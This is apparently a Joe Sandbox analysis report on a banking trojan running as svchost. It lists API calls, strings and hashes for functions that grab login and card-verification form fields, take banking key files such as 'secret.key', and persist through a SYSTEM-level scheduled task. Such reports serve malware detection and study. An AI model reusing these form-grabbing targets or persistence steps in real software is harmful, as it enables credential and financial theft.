                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02BD2B83
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,\clmain.exe), ref: 02BD2B95
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileModuleNamememset
                                                                                                                                                                                                                • String ID: \clmain.exe
                                                                                                                                                                                                                • API String ID: 350293641-582869414
                                                                                                                                                                                                                • Opcode ID: b759224586c1d30eaa3b40a308f170ce40d7cdb5a6c36f1d36009d217b3a3228
                                                                                                                                                                                                                • Instruction ID: e88247927a0df6abc34c2f3d4caafb5f3efe1c37441550f56b9109ec78e29ed5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b759224586c1d30eaa3b40a308f170ce40d7cdb5a6c36f1d36009d217b3a3228
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8F0A7B1A842086BDBA4DA749C86BE573A89718B05F4006E5FB4EC60C0F7F016D88B91
                                                                                                                                                                                                                Function 02BDE0FB Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02BDE119
                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(?), ref: 02BDE15E
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 02BDE1D2
                                                                                                                                                                                                                • free.MSVCRT ref: 02BDE1FF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Drive$ErrorLogicalModeStringsTypefree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2496910992-0
                                                                                                                                                                                                                • Opcode ID: db358a6fb3f38fc74d91778b82577468dde699b863da09cdd41c1a5857a5e3d1
                                                                                                                                                                                                                • Instruction ID: c262819e331132623780e9ae66b8ffa9f7cc74b06a9afbe8a6b774b1ad754ced
                                                                                                                                                                                                                • Opcode Fuzzy Hash: db358a6fb3f38fc74d91778b82577468dde699b863da09cdd41c1a5857a5e3d1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F331497270025E8FDB10CEA8E8847EE7B64EB45351F1406E2EA458B201F731C656CBA2
                                                                                                                                                                                                                Function 02BD0810 Relevance: 94.9, APIs: 46, Strings: 8, Instructions: 383memorysleepstringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD0830
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d727a), ref: 02BD0857
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD0895
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD089F
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD08A7
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD08B9
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD08C0
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BD08FC
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BD090A
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d727a,?,?), ref: 02BD0945
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD097F
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD0989
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD0991
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD09A0
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD09A7
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 02BD09D5
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02BD0A00
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD0A4B
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,secret.key,00000104,?,?,?), ref: 02BD0A65
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD0AA8
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002,?,?,?), ref: 02BD0AC2
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,02BFA5BC,00000002,?,?,?), ref: 02BD0AE7
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD0B2A
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,pubkeys.key,00000104,?,secret.key,00000002,?,?,?), ref: 02BD0B44
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002,?,?,?), ref: 02BD0B69
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02BD0BA1
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02BD0BA4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02BD0BB0
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?), ref: 02BD0BB3
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?,?,?), ref: 02BD0BC0
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD0BE6
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,?,?), ref: 02BD0C08
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},00000006,00000010,00000000,00000000,00000000,?), ref: 02BD0C23
                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?), ref: 02BD0C2E
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,?), ref: 02BD0C39
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,?,?,?), ref: 02BD0C40
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?,?,?,?), ref: 02BD0C50
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD0C62
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002,?,?,?), ref: 02BD0C8F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02BD0C92
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02BD0C9F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?), ref: 02BD0CA2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002,?,?,?), ref: 02BD0CAB
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02BD0CAE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 02BD0CBF
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?), ref: 02BD0CC2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$ErrorFreeLastPathSecuritymemset$CreateDescriptorDirectoryFileSleepValidatelstrcpyn$AdminAttributesBackslashFolderHandleMakeMutexSystemUser$CloseConvertCurrentDeleteInfoInformationLocalNamedReleaseSaclString
                                                                                                                                                                                                                • String ID: 617d727a$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$P0Wu$S:(ML;;NRNWNX;;;LW)$keys.zip$path.txt$pubkeys.key$secret.key
                                                                                                                                                                                                                • API String ID: 1233543684-2550566778
                                                                                                                                                                                                                • Opcode ID: 8398757027ca5ef586260ada1c68fa2624c4c75ac0be94274b839a87a6efcfa1
                                                                                                                                                                                                                • Instruction ID: 36bf51d71861ff7cf7ff5a967bd0355aacfd5a82aa4294e23af7c989d0724e21
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8398757027ca5ef586260ada1c68fa2624c4c75ac0be94274b839a87a6efcfa1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04D10170944341AFE760AB74D888FAB7BE8EF89744F444E98F68587140EB74D518CBA1
                                                                                                                                                                                                                Function 02BC89D0 Relevance: 91.4, APIs: 37, Strings: 15, Instructions: 400threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC89F2
                                                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,02BC0BE3), ref: 02BC8A0F
                                                                                                                                                                                                                  • Part of subcall function 02BC4170: GetProcessHeap.KERNEL32(00000008,02BC0BF7,02BC0BE3,?,02BC8A25,?,?,?), ref: 02BC4181
                                                                                                                                                                                                                  • Part of subcall function 02BC4170: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02BC4188
                                                                                                                                                                                                                  • Part of subcall function 02BC4170: memset.MSVCRT ref: 02BC4198
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,02BC0BE3,?,?,?), ref: 02BC8A35
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvv=,00000000,7556F380,00000000,00000001,00000000,?,?,?,02BC8A44,?,?,?,?,?), ref: 02BCE433
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE441
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE44D
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE45B
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE467
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE479
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: strstr.MSVCRT ref: 02BCE48F
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: strstr.MSVCRT ref: 02BCE4A2
                                                                                                                                                                                                                  • Part of subcall function 02BCE3F0: GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02BCE50B
                                                                                                                                                                                                                  • Part of subcall function 02BD44A0: strstr.MSVCRT ref: 02BD44DC
                                                                                                                                                                                                                  • Part of subcall function 02BD44A0: strstr.MSVCRT ref: 02BD44EF
                                                                                                                                                                                                                  • Part of subcall function 02BD44A0: strstr.MSVCRT ref: 02BD4502
                                                                                                                                                                                                                  • Part of subcall function 02BD44A0: PathAddBackslashA.SHLWAPI(02C0D2A0), ref: 02BD4528
                                                                                                                                                                                                                  • Part of subcall function 02BD44A0: PathAddBackslashA.SHLWAPI(02C0D2A0), ref: 02BD4562
                                                                                                                                                                                                                  • Part of subcall function 02BD44A0: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02BD45CD
                                                                                                                                                                                                                  • Part of subcall function 02BD44A0: GetLastError.KERNEL32 ref: 02BD45D7
                                                                                                                                                                                                                  • Part of subcall function 02BD1A60: strstr.MSVCRT ref: 02BD1A83
                                                                                                                                                                                                                  • Part of subcall function 02BD1A60: strstr.MSVCRT ref: 02BD1A92
                                                                                                                                                                                                                  • Part of subcall function 02BD1A60: strstr.MSVCRT ref: 02BD1AA1
                                                                                                                                                                                                                  • Part of subcall function 02BD1A60: PathAddBackslashA.SHLWAPI(02C0D4A8), ref: 02BD1ACD
                                                                                                                                                                                                                  • Part of subcall function 02BD1A60: PathAddBackslashA.SHLWAPI(02C0D4A8), ref: 02BD1B03
                                                                                                                                                                                                                  • Part of subcall function 02BD1A60: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02BD1B6C
                                                                                                                                                                                                                  • Part of subcall function 02BD1A60: GetLastError.KERNEL32 ref: 02BD1B76
                                                                                                                                                                                                                  • Part of subcall function 02BD1A60: IsUserAnAdmin.SHELL32 ref: 02BD1B7E
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,j_username=,00000000,00000000,?,?,?,?,?,?), ref: 02BC8A5C
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,j_password=,?,?,?,?,?,?), ref: 02BC8A6C
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73CA,?,?,?,?,?,?), ref: 02BC8A9D
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(00000000,617D73CA,?,?,?,?,?,?), ref: 02BC8AAB
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02BC8AB8
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73CA,?,?,?,?,?,?), ref: 02BC8ABF
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,command=auth_loginByPassword&back_command=&back_custom1=&,?,?,?,?,?,?), ref: 02BC8B2E
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d73f8,?,?,?,?,?,?), ref: 02BC8B5D
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(00000000,617d73f8,?,?,?,?,?,?), ref: 02BC8B6B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02BC8B78
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d73f8,?,?,?,?,?,?), ref: 02BC8B7F
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,edClientLogin=,?,?,?,?,?,?), ref: 02BC8BF3
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,edUserLogin=,?,?,?,?,?,?), ref: 02BC8C03
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,edPassword=,?,?,?,?,?,?), ref: 02BC8C13
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D731E,?,?,?,?,?,?), ref: 02BC8C3D
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(00000000,617D731E,?,?,?,?,?,?), ref: 02BC8C4B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02BC8C58
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D731E,?,?,?,?,?,?), ref: 02BC8C5F
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&LOGIN_AUTHORIZATION_CODE=,?,?,?,?,?,?), ref: 02BC8CCF
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d72c4,?,?,?,?,?,?), ref: 02BC8CFD
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(00000000,617d72c4,?,?,?,?,?,?), ref: 02BC8D0B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02BC8D18
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d72c4,?,?,?,?,?,?), ref: 02BC8D1F
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,action=auth&np=&login=,?,?,?,?,?,?), ref: 02BC8D93
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d7242,?,?,?,?,?,?), ref: 02BC8DBD
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(00000000,617d7242,?,?,?,?,?,?), ref: 02BC8DCB
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d7242,?,?,?,?,?,?), ref: 02BC8DD6
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,CryptoPluginId=AGAVA&Sign,?,?,?,?,?,?), ref: 02BC8E43
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0CF94,?,?,?,?,?,?), ref: 02BC8E6D
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(00000000,02C0CF94,?,?,?,?,?,?), ref: 02BC8E7B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0CF94,?,?,?,?,?,?), ref: 02BC8E86
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD3570,00000000,00000000,00000000), ref: 02BC8EE8
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,02BC0BE3,?,?,?,?,?,?), ref: 02BC8F00
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 02BC8F11
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$Backslash$strstr$Append$CreateHeap$DirectoryErrorHandleLastProcessmemset$AdminAllocateCloseInformationReadThreadUsermemcpy
                                                                                                                                                                                                                • String ID: &LOGIN_AUTHORIZATION_CODE=$617D731E$617D73CA$617d7242$617d72c4$617d73f8$CryptoPluginId=AGAVA&Sign$action=auth&np=&login=$command=auth_loginByPassword&back_command=&back_custom1=&$edClientLogin=$edPassword=$edUserLogin=$j_password=$j_username=$pass.log
                                                                                                                                                                                                                • API String ID: 899697972-651442431
                                                                                                                                                                                                                • Opcode ID: 492d03999d302eb0a420ab4dc177ec5de7d7134b8eb4fb4c46699947bd590699
                                                                                                                                                                                                                • Instruction ID: 12e6dfba094bef9b8b3ba6623eb5fd6a4e1f96e30068a62c689d1bb51b4b6ff3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 492d03999d302eb0a420ab4dc177ec5de7d7134b8eb4fb4c46699947bd590699
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22D12835A442149BDB229B289C40BEB7FF89F95B40F2485DAEAC597240CFB09945CFE1
                                                                                                                                                                                                                Function 02BC2A90 Relevance: 70.4, APIs: 35, Strings: 5, Instructions: 355memoryfileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 02BC2AAC
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02BC2AC5
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BC2ACC
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 02BC2B0B
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02BC2B25
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BC2B2F
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000), ref: 02BC2BA8
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02BC2BCE
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BC2BED
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,02BFFB50,00000000), ref: 02BC2C0F
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02BC2C2A
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 02BC2C35
                                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 02BC2C52
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 02BC2C84
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC2C8B
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC2C9F
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 02BC2D40
                                                                                                                                                                                                                • LockFile.KERNEL32(?,00000000,00000000,00000001,00000000), ref: 02BC2D51
                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,00000001,?,00000000), ref: 02BC2D61
                                                                                                                                                                                                                • UnlockFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 02BC2D72
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC2D7B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC2D82
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC2D8F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC2D96
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,02BFFB50), ref: 02BC2DB1
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC2DB4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,02BFFB50), ref: 02BC2DC1
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC2DC4
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC2DE1
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC2DF3
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02BFFB50), ref: 02BC2DFE
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BC2E39
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BC2E48
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 02BC2E5B
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BC2E68
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Heap$PathProcess$Security$DescriptorFreePointer$BackslashCreateCriticalFolderHandleLockSectionUnlockValidateWrite$AllocCloseConvertEnterExistsInfoInformationLeaveLocalNamedSaclStringmemset
                                                                                                                                                                                                                • String ID: 9E938D2Aa$9e938de8a$S:(ML;;NRNWNX;;;LW)$[/pst]$[pst]
                                                                                                                                                                                                                • API String ID: 255608459-1339878934
                                                                                                                                                                                                                • Opcode ID: ef35ca78aa212d3b28078e71e7f92a118c7fbee0865416c366c2b21aeec664db
                                                                                                                                                                                                                • Instruction ID: c5e7883f3412f09b2543eb06d3e3ecbdff9bef7809884d2d5beb4a3abab6140c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef35ca78aa212d3b28078e71e7f92a118c7fbee0865416c366c2b21aeec664db
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65C1E231644305AFE7209F249C98FABBBA8EF88744F544A5CFA85DB180DB70D914CBA1
                                                                                                                                                                                                                Function 00403560 Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 368memoryfileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                                • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                                • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                                • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                                  • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                  • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                  • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                  • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                  • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004036CB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 00403717
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 0040371E
                                                                                                                                                                                                                • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • p=5w, xrefs: 0040394B
                                                                                                                                                                                                                • <Actions , xrefs: 0040380A
                                                                                                                                                                                                                • 00-->, xrefs: 0040383F
                                                                                                                                                                                                                • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                                • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                                • task%d, xrefs: 0040365C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
